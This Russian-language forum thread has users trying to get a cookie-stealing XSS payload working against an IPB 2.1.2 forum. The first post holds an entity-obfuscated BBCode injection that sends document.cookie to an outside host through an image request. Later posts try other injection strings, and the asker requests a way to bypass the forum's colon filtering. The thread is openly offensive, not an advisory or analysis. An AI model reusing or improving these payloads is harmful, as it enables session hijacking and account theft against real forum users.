Вопрос про XSS на форуме IPB 2.1.2.

Вот пытаюсь вставить эту XSS:

HTML:

[post=1000[topic=target style=background&*#58;url(javascript*:document.image*s&#9*1;&#*49;].*src=*"*&#104*;&#11*6;&#1*16;&*#112*;&#5*8;&#*47;&#*47;&#*97;&#*110;*&#116*;&#1*05;&#*99;&*#104;*a*&#11*6;&#*46;&#*114;&*#117*;&#4*7;&#9*9;&#1*03;&*#105;*&#45*;&#98*;&#10*5;&#1*10;&*#47;s.j&*#112;g?"+document.cookie); ]       [/topic]]

Естественно без звездочек, пост на форуме пустой если поставить алерт

HTML:

[post=1000[topic=target style=background:url(javascript:alert()); ]       [/topic]]

, то он не выскакивает.

 

каким браузером?

 

Ie 6.0

 

Попробуй таким макаром

HTML:

[topic=1000[post=aaa/ style=background:url(javascript:alert()); [/topic][/post]

 

Не выходит, даже код не скрывает.

 

Насколько я поял, дело здесь в том, что форум не пропускает двоеточие :
Вот код поста после отсылки его на форум ( Без звездочки)

HTML:

		<div class="postcolor" style='padding:4px;'><a href='index.php?act=findpost&pid=1000<a href='index.php?showtopic=target style=background&*#58;url(java script:alert()); '>       </a>'><br /><br /><br /></a></div>

Есть ли возможность обойти это, или подскажите какой нибудь другой код для XSS...

 

&*#58; естественно без звезды

 

Ну просто без звезды здесь &*#58; пробразуеться в двоеточие, а это уже не то, что было в коде поста, после отправки на форум.
Так есть ли другой код или способ обойти фильтрацию двоеточий?